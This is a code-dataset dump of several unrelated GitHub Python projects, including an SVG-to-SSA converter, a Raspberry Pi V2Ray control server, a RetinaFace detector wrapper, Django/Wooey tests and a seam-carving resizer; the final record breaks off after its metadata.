metadata
dict
text
stringlengths
60
3.49M
{ "source": "8day/svg2ssa", "score": 2 }
#### File: 8day/svg2ssa/s2s_main.py ```python import re import tkinter # Uncomment when cx_Freeze'ing. # from lxml import etree # from xml.etree import ElementTree as etree # Uncomment when used as is. try: from lxml import etree except ImportError: # See: http://lxml.de/compatibility.html from xml.etree import ElementTree as etree import s2s_runtime_settings from s2s_core import * from s2s_utilities import convert_svglength_to_pixels from s2s_svgatts_misc import * from s2s_svgatts_color import * from s2s_svgatts_opacity import * from s2s_svgatts_trafos import SVGTransform, SVGTrafoRotate, SVGTrafoScale from s2s_svgatts_path import SVGD class SVGElement(S2SBlockInitDataProcDtype, S2SBlockDtypeChangeable, SVGAttribute, S2SBlockContainer): """Converts all the attributes that other classes feed him. Currently works only with "path" and "g". """ atts_color = {'color', 'fill', 'stroke'} atts_opacity = {'opacity', 'fill-opacity', 'stroke-opacity'} atts_rest = {'stroke-width'} atts_style = atts_color | atts_opacity | atts_rest atts_path = {'d', 'id', 'transform', 'style'} | atts_style atts_group = {'transform', 'style'} | atts_style atts_to_class_mapping = {'transform': SVGTransform, 'color': SVGColor, 'fill': SVGFill, 'fill-opacity': SVGFillOpacity, 'opacity': SVGOpacity, 'stroke': SVGStroke, 'stroke-opacity': SVGStrokeOpacity, 'stroke-width': SVGStrokeWidth, 'd': SVGD, 'id': SVGId} @staticmethod def process_exceptional_cases(atts): # Process trafos. if 'transform' in atts: trafos = atts['transform'] # Create \org if it is absent so that each next SSA layer # automatically layed on top of previous w/o any shifting. # ATM only VSFilter behaves like this, maybe libass as well, # but not ffdshow subtitles filter. # \pos also will do the trick, but if it's not \pos(0,0). if 'rotate' in trafos: if 'translate' in trafos: for i in range(len(trafos)): # If there's empty \pos, then there's no need in it, so remove \pos, -- there's still \org after all. if trafos.data[i].dtype == 'translate' and (trafos.data[i].data[0] == 0 and trafos.data[i].data[1] == 0): del trafos.data[i] break else: # There's still \org, so everything is OK. pass else: if 'translate' in trafos: for i in range(len(trafos)): # If there's empty \pos, then there's no need in it, so remove \pos, but add \org(0,0) to maintain collision detection override. if trafos.data[i].dtype == 'translate' and (trafos.data[i].data[0] == 0 and trafos.data[i].data[1] == 0): del trafos.data[i] atts['transform'] = trafos + SVGTrafoRotate((0, 0, 0)) break else: # There's no \org, so add it. atts['transform'] = trafos + SVGTrafoRotate((0, 0, 0)) # Create CTM for path to emulate subpixel precision. if 'matrix' in trafos: val = 2 ** (s2s_runtime_settings.magnification_level - 1) val = val, val path_ctm = SVGTrafoScale(val).matrix + trafos.data[0] else: val = 2 ** (s2s_runtime_settings.magnification_level - 1) val = val, val path_ctm = SVGTrafoScale(val).matrix else: # Create trafos with \org(0,0) and CTM for path. trafos = SVGTransform() rotate = SVGTrafoRotate((0, 0, 0)) trafos.data = [rotate] atts['transform'] = trafos val = 2 ** (s2s_runtime_settings.magnification_level - 1) val = val, val path_ctm = SVGTrafoScale(val).matrix # Process path. atts['d'].ctm = path_ctm # Process color. 'Fill' attribute has higher priority over 'color'! if 'fill' in atts: if atts['fill'].data is None: tmp = SVGFillOpacity() tmp.data = 0.0 atts['fill-opacity'] = tmp del atts['fill'] if 'color' in atts: del atts['color'] if 'color' in atts: if atts['color'].data is None: tmp = SVGFillOpacity() tmp.data = 0.0 atts['fill-opacity'] = tmp else: tmp = SVGFill() tmp.data = atts['color'].data # Fixme: since I stated that "'Fill' attribute has higher priority over 'color'!!!" (is that right at all?!), # maybe I should've checked first whether 'fill' exists so that I exidentally wouldn't override it?! # Todo: check in custom SVG. atts['fill'] = tmp del atts['color'] if 'stroke' in atts: if atts['stroke'].data is None: tmp = SVGStrokeWidth() tmp.data = 0.0 atts['stroke-width'] = tmp del atts['stroke'] # Process opacity. if 'opacity' in atts: if 'fill-opacity' in atts and 'stroke-opacity' in atts: atts['fill-opacity'] += atts['opacity'] atts['stroke-opacity'] += atts['opacity'] del atts['opacity'] elif 'fill-opacity' in atts: atts['fill-opacity'] += atts['opacity'] del atts['opacity'] elif 'stroke-opacity' in atts: atts['stroke-opacity'] += atts['opacity'] del atts['opacity'] # Process 'id'. if not 'id' in atts: atts['id'] = SVGId("") return atts def preprocess(self, data): # Select appropriate set of attributes. if self.dtype == 'path': supported = SVGElement.atts_path # IT IS COMPLETELY SAFE TO USE 'SELF' TO ACCESS CLASS VARS. IT'S UNSAFE, THOUGH, WHEN I WANT TO EDIT CLASS VARS: I'LL EDIT INSTANCE VARS INSTEAD. else: supported = SVGElement.atts_group # Filter out unsupported attributes. atts = {key: val for key, val in data.items() if key in supported} # Unpack properties from "style" to the common set of attributes. if 'style' in atts: tokens = re.sub('\s+', '', atts['style']) tokens = re.findall(r'(?:([^:]+?):([^;]+?)(?:;|;\Z|\Z))', tokens) if tokens: for key, val in tokens: if key in SVGElement.atts_style: atts.update({key: val}) del atts['style'] # Process attributes. atts = {key: SVGElement.atts_to_class_mapping[key](val) for key, val in atts.items()} return atts def update(self, other): # Note: beware of mutability issues. curr, prev = self.data, other.data for key in prev: curr[key] = curr[key] + prev[key] if key in curr else prev[key] return self def convert(self): atts = SVGElement.process_exceptional_cases(self.data) return {key: att.convert() for key, att in atts.items()} class S2S: """This is 'main()', if you like. Spins all the machinery behind it. """ def __init__(self, filepath): self.filepath = filepath self.element_stack = [] self.container_stack = [] self.ssa_meta = {} @staticmethod def make_round_and_mod(nmb, mod): nmb = round(nmb) if nmb % mod != 0: nmb += mod - (nmb % mod) return nmb def start_event_for_g(self, atts): curr = SVGElement('g', atts) try: prev = self.container_stack[-1] curr += prev except IndexError: pass self.container_stack.append(curr) def end_event_for_g(self): if self.container_stack: del self.container_stack[-1] def start_event_for_path(self, atts): curr = SVGElement('path', atts) try: prev = self.container_stack[-1] curr += prev except IndexError: pass self.element_stack.append(curr) def end_event_for_path(self): pass def start_event_for_svg(self, atts): width = atts.get('width') height = atts.get('height') if width is not None and height is not None: width = atts['width'] height = atts['height'] width = convert_svglength_to_pixels(width) height = convert_svglength_to_pixels(height) width = S2S.make_round_and_mod(width, 16) height = S2S.make_round_and_mod(height, 16) else: width = s2s_runtime_settings.ssa_default_playresx height = s2s_runtime_settings.ssa_default_playresx self.ssa_meta['playresx'] = width self.ssa_meta['playresy'] = height def end_event_for_svg(self): pass start = dict(path = start_event_for_path, g = start_event_for_g, svg = start_event_for_svg) end = dict(path = end_event_for_path, g = end_event_for_g, svg = end_event_for_svg) def convert(self): filepath = self.filepath for action, element in etree.iterparse(filepath, ('start', 'end')): ns_name, local_name = re.search(r'^(\{.+?\})(.+)$', element.tag).group(1, 2) if action == 'start': if local_name in S2S.start: S2S.start[local_name](self, element.attrib) else: if local_name in S2S.end: S2S.end[local_name](self) ssa_table = [] for element in self.element_stack: atts = element.convert() ssa_table.append(s2s_runtime_settings.ssa_event.format(actor = atts.pop('id'), trans = atts.pop('transform'), drwng = atts.pop('d'), m_lev = s2s_runtime_settings.magnification_level, codes = ''.join(obj for key, obj in atts.items()))) ssa_table = '\n'.join(ssa_table) if s2s_runtime_settings.export_type == 0: tk = tkinter.Tk() tk.withdraw() tk.clipboard_clear() tk.clipboard_append(ssa_table) tk.destroy() print('Successfully converted:', filepath if len(filepath) < 52 else '...' + filepath[-52:]) elif s2s_runtime_settings.export_type == 1: ssa_header = s2s_runtime_settings.ssa_header.format(width = self.ssa_meta['playresx'], height = self.ssa_meta['playresy']) with open(filepath + '.ass', 'w+t', buffering = 65536) as fh: fh.write(ssa_header) fh.write('\n') fh.write(ssa_table) fh.write('\n') print('Successfully converted:', filepath if len(filepath) < 52 else '...' + filepath[-52:]) self.element_stack = [] self.container_stack = [] self.ssa_meta = {} ```
{ "source": "8DE4732A/rasp_control", "score": 2 }
#### File: 8DE4732A/rasp_control/server.py ```python import sqlite3 import subprocess import json import urllib import base64 import io import time import random import psutil from threading import Lock from flask import Flask, render_template, abort, g, request, jsonify from jinja2 import TemplateNotFound from flask_socketio import SocketIO, emit app = Flask(__name__) socketio = SocketIO(app) thread = None thread_lock = Lock() DATABASE = 'rasp.db' CONTROL_PATH = 'control.json' CONFIG_PATH = 'config.json' SUBSCRIPTION_URL = 'http://localhost/V2RayN_1597068639.txt' def make_dicts(cursor, row): return dict((cursor.description[idx][0], value) for idx, value in enumerate(row)) def get_db(): db = getattr(g, '_database', None) if db is None: db = g._database = sqlite3.connect(DATABASE) db.row_factory = make_dicts return db def init_db(): with app.app_context(): db = get_db() with app.open_resource('schema.sql', mode='r') as f: db.cursor().executescript(f.read()) db.commit() init_db() def query_db(query, args=(), one=False): cur = get_db().execute(query, args) rv = cur.fetchall() cur.close() return (rv[0] if rv else None) if one else rv def delete_db(): get_db().execute("delete from vmess where 1 = 1") get_db().commit() def insert_many_db(sql, args=[]): get_db().executemany(sql, args) get_db().commit() def update_db(sql, args=()): get_db().execute(sql, args) get_db().commit() @app.teardown_appcontext def close_connection(exception): db = getattr(g, '_database', None) if db is not None: db.close() @app.route('/', defaults={'page': 'index'}) @app.route('/<page>') def index(page): try: return render_template('%s.html' % page) except TemplateNotFound: abort(404) @app.route('/v1/subscription', methods=['GET', 'POST']) def subscription(): if request.method == 'GET': results = query_db("select * from vmess where 1 = 1;") print(results) data = [] for v in results: print(v) vmess = {"index": v["id"], "name": v["name"], "used": v["used"], "ping": 0, "bandwidth": 0} data.append(vmess) return jsonify(data) elif request.method == 'POST': print(request.form.get("action")) if(request.form.get("action") == "update"): req = urllib.request.Request(SUBSCRIPTION_URL) req.add_header( "User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36") with urllib.request.urlopen(req) as f: serverListLink = base64.b64decode( f.read()).splitlines() if serverListLink: app.logger.info(serverListLink) delete_db() data = [] for i in range(len(serverListLink)): serverNode = json.loads(base64.b64decode( bytes.decode(serverListLink[i]).replace('vmess://', ''))) print('[' + str(i) + ']' + serverNode['ps']) serverListLink[i] = serverNode data.append( (i, serverNode['ps'], json.dumps(serverNode))) app.logger.info(data) insert_many_db( "insert into vmess(id, name, vmess) values(?,?,?)", data) return jsonify({"code": 0}) elif(request.form.get("action") == "set"): index = request.form.get("index") result = query_db( "select vmess from vmess where id = ?", (index, ), one=True) print(result) vmess = json.loads(result["vmess"]) export(vmess, CONFIG_PATH, 'v2config.json') export(vmess, '/etc/v2ray/config-ns.json', 'v2config-ns.json') restart() update_db("update vmess set used = ? where 1 = 1", (0,)) update_db("update vmess set used = 1 where id = ?", (index,)) return jsonify({"code": 0}) def export(vmess, path=CONFIG_PATH, template='v2config.json'): with open(template, 'r') as t: v2rayConf = t.read() v2rayConf = v2rayConf.replace("&address", vmess["add"]) v2rayConf = v2rayConf.replace("&port", str(vmess["port"])) v2rayConf = v2rayConf.replace("&alterId", str(vmess["aid"])) v2rayConf = v2rayConf.replace("&uuid", vmess["id"]) v2rayConf = v2rayConf.replace("&path", vmess["path"]) with open(path, 'w+') as f: f.write(v2rayConf) def restart(): subprocess.call('systemctl restart v2ray-ns.service', shell=True) subprocess.call('systemctl restart v2ray.service', shell=True) @app.route('/v1/control', methods=['GET', 'POST']) def control(): if request.method == 'GET': with open(CONTROL_PATH, 'r') as f: return f.read() elif request.method == 'POST': control = request.get_json() name = control["name"] with open(CONTROL_PATH, 'r') as f: control = json.loads(f.read()) for ctrl in control: if ctrl["name"] == name: print(ctrl["script"]) return subprocess.call(ctrl["script"], shell=True) @app.route('/v1/config', methods=['GET', ]) def config(): with open(CONFIG_PATH, 'r') as f: return f.read() @socketio.on('disconnect', namespace='/ws/status') def test_disconnect(): app.logger.info('ws disconnected') @socketio.on('connect', namespace='/ws/status') def status_connect(): app.logger.info("ws connect") @socketio.on('status', namespace='/ws/status') def status_all(status): app.logger.info("get all status") result = {"cpu": psutil.cpu_percent( interval=0.2, percpu=True), "cpuAve": psutil.cpu_percent( interval=0.2), "mem": psutil.virtual_memory()._asdict(), "swap": psutil.swap_memory()._asdict(), "temp": psutil.sensors_temperatures(), "uuid": status} app.logger.info("emit") emit("message", json.dumps(result), namespace="/ws/status") if __name__ == '__main__': socketio.run(app=app, port=8080, debug=True) ```
{ "source": "8Dion8/retinaface", "score": 2 }
#### File: retinaface/src/retinaface.py ```python import tensorflow as tf import numpy as np from utilpack.util import * import os class RetinaFace(object): def __init__(self,quality='normal'): """ :param quality: one of [ 'high','normal','speed' ] """ if quality == 'normal': self._resizeFunc = lambda v: PyImageUtil.resize_image(v[0], **{v[1]: 800}) elif quality =='speed': self._resizeFunc = lambda v: PyImageUtil.resize_image(v[0], **{v[1]: 320}) else: self._resizeFunc = lambda v: v[0] print("model[{} quality] init ..".format(quality)) current_dir = os.path.dirname(os.path.abspath(__file__)) with tf.io.gfile.GFile(current_dir+'/frozen_graph.pb', "rb") as f: graph_def = tf.compat.v1.GraphDef() graph_def.ParseFromString(f.read()) def _imports_graph_def(): tf.compat.v1.import_graph_def(graph_def, name="") wrapped_import = tf.compat.v1.wrap_function(_imports_graph_def, []) import_graph = wrapped_import.graph self._model = wrapped_import.prune( tf.nest.map_structure(import_graph.as_graph_element, ['x:0']), tf.nest.map_structure(import_graph.as_graph_element, ['Identity:0']) ) self.predict(np.zeros((320,320,3),dtype=np.float32)) print("model success !") def read(self,image_path): """ read image from path :param image_path: :return: rgb image, float32 """ img_cv = PyImageUtil.cv2.imread(image_path) rgb_image = PyImageUtil.cv2.cvtColor(img_cv,PyImageUtil.cv2.COLOR_BGR2RGB).astype(np.float32) return rgb_image def _predict(self,rgb_image,threshold=0.95): """ detect face in rgb image :param rgb_image: rgb image, ! width, height have to multiplier of 32 !, float32 :param threshold: threshold of confidence :return: faces(list), eache face(dict) has a key = [ x1, y1, x2, y2,left_eye,right_eye,nose,left_lip,right_lip ] """ img_h, img_w = rgb_image.shape[:2] # preprocessing (padding) x = tf.cast(rgb_image, dtype=tf.float32) # prediction outputs = tf.squeeze(self._model(x[tf.newaxis, ...]), axis=0) # postprocessing (remove-padding,ratio to pixcel, threshold) outputs = tf.concat([ tf.reshape(tf.multiply(tf.reshape(tf.slice(outputs, [0, 0], [-1, 14]), [-1, 7, 2]),[img_w, img_h]),[-1, 14]), tf.slice(outputs, [0, 14], [-1, 2]) ], axis=1) outputs = tf.gather_nd(outputs, tf.where(tf.squeeze(tf.slice(outputs, [0, 15], [-1, 1]), axis=-1) >= threshold)) faces = [] for bbox in outputs: x1, y1, x2, y2 = list(map(int, bbox[:4])) left_eye, right_eye, nose, left_lip, right_lip = list(map(tuple, np.reshape(bbox, [-1, 2]).astype(np.int)[2:-1])) faces.append({ 'x1': x1, 'y1': y1, 'x2': x2, 'y2': y2, 'left_eye': left_eye, 'right_eye': right_eye, 'nose': nose, 'left_lip': left_lip, 'right_lip': right_lip }) return faces def predict(self,rgb_image,threshold=0.95): """ detect face in rgb image :param rgb_image: rgb image, any size, float32 :param threshold: threshold of confidence :return: faces(list), eache face(dict) has a key = [ x1, y1, x2, y2,left_eye,right_eye,nose,left_lip,right_lip ] """ img_h_, img_w_ = rgb_image.shape[:2] if img_h_>img_w_: rgb_image = self._resizeFunc([rgb_image,'height']) else: rgb_image = self._resizeFunc([rgb_image, 'width']) img_h, img_w = rgb_image.shape[:2] # preprocessing (padding) max_steps = 32 img_h_pad = max_steps - img_h % max_steps if img_h and img_h % max_steps != 0 else 0 img_w_pad = max_steps - img_w % max_steps if img_w and img_w % max_steps != 0 else 0 padded_img = tf.pad(rgb_image, [[0, img_h_pad], [0, img_w_pad], [0, 0]]) x = tf.cast(padded_img, dtype=tf.float32) # prediction outputs = tf.squeeze(self._model(x[tf.newaxis, ...]), axis=0) # postprocessing (remove-padding,ratio to pixcel, threshold) outputs = tf.concat([ tf.reshape(tf.multiply(tf.reshape(tf.slice(outputs, [0, 0], [-1, 14]), [-1, 7, 2]), [tf.add(img_w_pad, img_w if img_w else 0), tf.add(img_h_pad, img_h if img_h else 0)]), [-1, 14]), tf.slice(outputs, [0, 14], [-1, 2]) ], axis=1) outputs = tf.gather_nd(outputs, tf.where(tf.squeeze(tf.slice(outputs, [0, 15], [-1, 1]), axis=-1) >= threshold)) faces=[] for bbox in outputs: w_ex = img_w_ / img_w h_ex = img_h_ / img_h x1, y1, x2, y2 = list(map(int, np.multiply(bbox[:4],[w_ex,h_ex,w_ex,h_ex]))) left_eye,right_eye,nose,left_lip,right_lip = list(map(tuple,np.multiply(np.reshape(bbox, [-1, 2]),[w_ex,h_ex]).astype(np.int)[2:-1])) faces.append({ 'x1':x1,'y1':y1,'x2':x2,'y2':y2, 'left_eye':left_eye,'right_eye':right_eye,'nose':nose,'left_lip':left_lip,'right_lip':right_lip }) return faces def draw(self,rgb_image, faces,thickness=3,**kwargs): """ :param rgb_image: rgb_image , same size of predict's input :param faces: result of predict method :param thickness: thickness of line's :keyword colors: list of color, each color element mean [ faceRect, left_eye, right_eye, nose, left_lip, right_lip ] :return: result image """ darwing_img = rgb_image.copy() if 'colors' in kwargs: colors = kwargs['colors'] else: colors = [(255, 0, 255),(255, 0, 0),(0, 255, 0),(0, 0, 255),(0, 0, 0),(255, 0, 255)] for face in faces: PyImageUtil.cv2.rectangle(darwing_img, (face['x1'], face['y1']), (face['x2'], face['y2']), colors[0], thickness) PyImageUtil.cv2.circle(darwing_img, face['left_eye'], 1, colors[1], thickness) PyImageUtil.cv2.circle(darwing_img, face['right_eye'], 1, colors[2], thickness) PyImageUtil.cv2.circle(darwing_img, face['nose'], 1, colors[3], thickness) PyImageUtil.cv2.circle(darwing_img, face['left_lip'], 1, colors[4], thickness) PyImageUtil.cv2.circle(darwing_img, face['right_lip'], 1, colors[5], thickness) return darwing_img if __name__ == '__main__': import cv2 detector = RetinaFace('normal') for path in PyDataUtil.get_pathlist('/Users/hian/Desktop/Data/image_data/snaps_image/thum'): rgb_image = detector.read(path) rgb_image = cv2.resize(rgb_image,(640,640)) PyDebugUtil.tic() faces = detector._predict(rgb_image) time = PyDebugUtil.toc() ```
{ "source": "8dspaces/orderlc", "score": 2 }
#### File: orderlc/admin/views.py ```python from flask import Blueprint, render_template from flask_login import login_required, current_user from flask_admin import Admin, BaseView, expose from flask_admin.contrib.sqla import ModelView class AdminView(BaseView): def is_accessible(self): return current_user.is_authenticated() and current_user.is_admin # class ModelView(ModelView, AdminView): # pass from ..extensions import flask_admin, db from ..user.models import User from ..public.models import Customer, Good, Container flask_admin.add_view(ModelView(User, db.session, endpoint='user-admin')) flask_admin.add_view(ModelView(Container, db.session, endpoint='container-admin')) flask_admin.add_view(ModelView(Good, db.session, endpoint='good-admin')) flask_admin.add_view(ModelView(Customer, db.session, endpoint='customer-admin')) ```
{ "source": "8dspaces/Wooey-Flask", "score": 2 }
#### File: wooey/tests/test_commands.py ```python import os from django.test import TestCase from . import config from ..backend import utils from . import mixins class FormTestCase(mixins.ScriptFactoryMixin, TestCase): def test_addscript(self): from django.core.management import call_command call_command('addscript', os.path.join(config.WOOEY_TEST_SCRIPTS, 'command_order.py')) ``` #### File: wooey/tests/test_utils.py ```python import os from django.test import TestCase from ..backend import utils from . import factories from . import config from . import mixins class TestUtils(mixins.ScriptFactoryMixin, TestCase): def test_sanitize_name(self): assert(utils.sanitize_name('abc')) == 'abc' assert(utils.sanitize_name('ab c')) == 'ab_c' assert(utils.sanitize_name('ab-c')) == 'ab_c' def test_sanitize_string(self): assert(utils.sanitize_string('ab"c')) == 'ab\\"c' def test_add_script(self): pass # TODO: fix me # utils.add_wooey_script(script=os.path.join(config.WOOEY_TEST_SCRIPTS, 'translate.py')) def test_anonymous_users(self): from .. import settings as wooey_settings from django.contrib.auth.models import AnonymousUser user = AnonymousUser() script_version = self.translate_script script = script_version.script d = utils.valid_user(script, user) self.assertTrue(d['valid']) wooey_settings.WOOEY_ALLOW_ANONYMOUS = False d = utils.valid_user(script, user) self.assertFalse(d['valid']) def test_valid_user(self): user = factories.UserFactory() script_version = self.translate_script script = script_version.script d = utils.valid_user(script, user) self.assertTrue(d['valid']) from .. import settings as wooey_settings self.assertEqual('disabled', d['display']) wooey_settings.WOOEY_SHOW_LOCKED_SCRIPTS = False d = utils.valid_user(script, user) self.assertEqual('hide', d['display']) from django.contrib.auth.models import Group test_group = Group(name='test') test_group.save() script.user_groups.add(test_group) d = utils.valid_user(script, user) self.assertFalse(d['valid']) user.groups.add(test_group) d = utils.valid_user(script, user) self.assertTrue(d['valid']) class TestFileDetectors(TestCase): def test_detector(self): self.file = os.path.join(config.WOOEY_TEST_DATA, 'fasta.fasta') res, preview = utils.test_fastx(self.file) self.assertEqual(res, True, 'Fastx parser fail') self.assertEqual(preview, open(self.file).readlines(), 'Fastx Preview Fail') def test_delimited(self): self.file = os.path.join(config.WOOEY_TEST_DATA, 'delimited.tsv') res, preview = utils.test_delimited(self.file) self.assertEqual(res, True, 'Delimited parser fail') self.assertEqual(preview, [i.strip().split('\t') for i in open(self.file).readlines()], 'Delimited Preview Fail') ``` #### File: wooey/tests/test_views.py ```python import json from django.test import TestCase, RequestFactory, Client from django.core.urlresolvers import reverse from django.contrib.auth.models import AnonymousUser from django.http import Http404 from nose.tools import raises from . import factories, mixins, config from ..views import wooey_celery from .. import views as wooey_views from .. import settings def load_JSON_dict(d): return json.loads(d.decode('utf-8')) class CeleryViews(mixins.ScriptFactoryMixin, mixins.FileCleanupMixin, TestCase): def setUp(self): super(CeleryViews, self).setUp() self.factory = RequestFactory() # the test server doesn't have celery running settings.WOOEY_CELERY = False def test_celery_results(self): request = self.factory.get(reverse('wooey:all_queues_json')) user = factories.UserFactory() request.user = user response = wooey_celery.all_queues_json(request) d = response.content.decode("utf-8") self.assertEqual({u'items': {u'global': [], u'results': [], u'user': []}, u'totals': {u'global': 0, u'results': 0, u'user': 0} }, json.loads(d)) job = factories.generate_job(self.translate_script) job.save() response = wooey_celery.all_queues_json(request) d = json.loads(response.content.decode("utf-8")) self.assertEqual(1, d['totals']['global']) job.user = user job.save() response = wooey_celery.all_queues_json(request) d = json.loads(response.content.decode("utf-8")) # we now are logged in, make sure the job appears under the user jobs self.assertEqual(1, d['totals']['user']) user = AnonymousUser() request.user = user response = wooey_celery.all_queues_json(request) d = json.loads(response.content.decode("utf-8")) # test empty response since anonymous users should not see users jobs self.assertEqual(d['items']['results'], []) self.assertEqual(d['items']['user'], []) def test_celery_commands(self): user = factories.UserFactory() job = factories.generate_job(self.translate_script) job.user = user job.save() celery_command = {'celery-command': ['delete'], 'job-id': [job.pk]} # test that we cannot modify a users script request = self.factory.post(reverse('wooey:celery_task_command'), celery_command) anon = AnonymousUser() request.user = anon response = wooey_celery.celery_task_command(request) d = response.content.decode("utf-8") self.assertFalse(json.loads(d).get('valid')) # test a nonsense command celery_command.update({'celery-command': ['thisshouldfail']}) response = wooey_celery.celery_task_command(request) d = response.content.decode("utf-8") self.assertFalse(json.loads(d).get('valid')) # test that the user can interact with it # the stop command will break, so currently untested here until I figure it out for i in ['resubmit', 'rerun', 'clone', 'delete']: celery_command.update({'celery-command': [i]}) request = self.factory.post(reverse('wooey:celery_task_command'), celery_command) request.user = user response = wooey_celery.celery_task_command(request) d = response.content.decode("utf-8") self.assertTrue(json.loads(d).get('valid')) def test_celery_task_view(self): user = factories.UserFactory() job = factories.generate_job(self.translate_script) job.user = user job.save() # test that an anonymous user cannot view a user's job view = wooey_celery.JobView.as_view() request = self.factory.get(reverse('wooey:celery_results', kwargs={'job_id': job.pk})) request.user = AnonymousUser() response = view(request, job_id=job.pk) self.assertIn('job_error', response.context_data) self.assertNotIn('job_info', response.context_data) # test the user can view the job request.user = user response = view(request, job_id=job.pk) self.assertNotIn('job_error', response.context_data) self.assertIn('job_info', response.context_data) @raises(Http404) def test_celery_nonexistent_task(self): # test request for non-existent job, should raise 404 view = wooey_celery.JobView.as_view() request = self.factory.get(reverse('wooey:celery_results', kwargs={'job_id': '-1'})) response = view(request, job_id=-1) class WooeyViews(mixins.ScriptFactoryMixin, mixins.FileCleanupMixin, TestCase): def setUp(self): super(WooeyViews, self).setUp() self.factory = RequestFactory() self.script_view_func = wooey_views.WooeyScriptJSON.as_view() # the test server doesn't have celery running settings.WOOEY_CELERY = False def test_multiple_choice_clone(self): from ..backend import utils script_version = self.choice_script script = script_version.script choices = ['2', '1', '3'] choice_param = 'two_choices' job = utils.create_wooey_job(script_version_pk=script_version.pk, data={'job_name': 'abc', choice_param: choices, 'wooey_type': script_version.pk}) request = self.factory.post(reverse('wooey:wooey_script_clone', kwargs={'slug': job.script_version.script.slug, 'job_id': job.pk}), data={'wooey_type': script_version.pk}) request.user = AnonymousUser() response = self.script_view_func(request, pk=job.pk, job_id=job.pk) self.assertEqual(response.status_code, 200) def test_multiple_choice(self): user = factories.UserFactory() script_version = self.choice_script script = script_version.script url = reverse('wooey:wooey_script', kwargs={'slug': script.slug}) data = {'job_name': 'abc', 'wooey_type': script_version.pk, 'two_choices': ['2', '1', '3']} filecount = 0 for i, v in config.SCRIPT_DATA['choices']['files'].items(): data[i] = v filecount += len(v) request = self.factory.post(url, data=data) request.user = user response = self.script_view_func(request) d = load_JSON_dict(response.content) self.assertTrue(d['valid'], d) self.assertEqual(sum([len(request.FILES.getlist(i)) for i in request.FILES.keys()]), filecount) # test submitting this in the 'currently' field from ..models import WooeyJob job = WooeyJob.objects.latest('created_date') files = [i.value.name for i in job.get_parameters() if i.parameter.slug == 'multiple_file_choices'] data['multiple_file_choices'] = files request = self.factory.post(url, data=data) request.user = user response = self.script_view_func(request) self.assertEqual(response.status_code, 200) d = load_JSON_dict(response.content) self.assertTrue(d['valid'], d) # check the files are actually with the new model job = WooeyJob.objects.latest('created_date') new_files = [i.value.url for i in job.get_parameters() if i.parameter.slug == 'multiple_file_choices'] self.assertEqual(len(new_files), len(files)) ```
{ "source": "8eodorosk/seam_carving", "score": 2 }
#### File: 8eodorosk/seam_carving/Seam.py ```python import numpy as np from imageio import imread, imwrite from scipy.ndimage.filters import convolve from tqdm import trange from matplotlib import pyplot as plt import numba class Seam: def __init__(self, filter_du, filter_dv, img): self.filter_du = filter_du self.filter_dv = filter_dv self.img = img def calc_energy(self): # print(self.img.shape) filter_du_3d = np.stack([self.filter_du] * 3, axis=2) filter_dv_3d = np.stack([self.filter_dv] * 3, axis=2) # print(filter_du_3d) # print(filter_dv_3d) self.img = self.img.astype('float32') convolved_x = np.absolute(convolve(self.img, filter_du_3d)) convolved_y = np.absolute(convolve(self.img, filter_dv_3d)) convolved = convolved_x + convolved_y # We sum the energies in the red, green, and blue channels energy_map = convolved.sum(axis=2) # energy_map_x = convolved_x.sum(axis=2) # energy_map_y = convolved_y.sum(axis=2) return energy_map @numba.jit def minimum_seam(self): r, c, _ = self.img.shape energy_map = self.calc_energy() M = energy_map.copy() backtrack = np.zeros_like(M, dtype=np.int) for i in range(1, r): for j in range(0, c): # Handle the left edge of the image, to ensure we don't index -1 if j == 0: idx = np.argmin(M[i - 1, j:j + 2]) backtrack[i, j] = idx + j min_energy = M[i - 1, idx + j] else: idx = np.argmin(M[i - 1, j - 1:j + 2]) backtrack[i, j] = idx + j - 1 min_energy = M[i - 1, idx + j - 1] M[i, j] += min_energy return M, backtrack class Carve(Seam): def __init__(self, filter_du, filter_dv, img, scale): Seam.__init__(self, filter_du, filter_dv, img) self.scale = scale @numba.jit def carve_column(self): r, c, _ = self.img.shape M, backtrack = self.minimum_seam() mask = np.ones((r, c), dtype=np.bool) j = np.argmin(M[-1]) for i in reversed(range(r)): # Mark the pixels for deletion mask[i, j] = False j = backtrack[i, j] mask = np.stack([mask] * 3, axis=2) self.img = self.img[mask].reshape((r, c - 1, 3)) return self.img def reduceWidth(self): r, c, _ = self.img.shape new_c = c - self.scale for i in trange(c - new_c): # use range if you don't want to use tqdm self.img = self.carve_column() return self.img def reduceHeight(self): self.img = np.rot90(self.img, 1, (0, 1)) self.img = self.reduceWidth() self.img = np.rot90(self.img, 3, (0, 1)) return self.img class CarveFirstSeam(Seam): def __init__(self, filter_du, filter_dv, img, scale): Seam.__init__(self, filter_du, filter_dv, img) self.scale = scale @numba.jit def show_seam_line(self): r, c, _ = self.img.shape M, backtrack = self.minimum_seam() mask = np.ones((r, c), dtype=np.bool) j = np.argmin(M[-1]) for i in reversed(range(r)): mask[i, j] = False j = backtrack[i, j] mask = np.stack([mask] * 3, axis=2) for i in range(r): for j in range(c): # for k in range(3): # koitame mono to prwto stoixeio tis maskas mias kai einai idiow kai stis alles 2 diastaseis o pinakas if mask[i][j][0] == False: self.img[i][j][0] = 255 self.img[i][j][1] = 0 self.img[i][j][2] = 0 # imwrite(self.out_name, self.img) # plt.imshow(self.img) return self.img def showSeamWidth(self): r, c, _ = self.img.shape new_c = c - self.scale for i in trange(c - new_c): # use range if you don't want to use tqdm self.img = self.show_seam_line() plt.imshow(self.img) return self.img def showSeamHeight(self): self.img = np.rot90(self.img, 1, (0, 1)) self.img = self.showSeamWidth() self.img = np.rot90(self.img, 3, (0, 1)) plt.imshow(self.img) return self.img ```
{ "source": "8-god-cross-sea/PHL-Automated-UI-Test", "score": 3 }
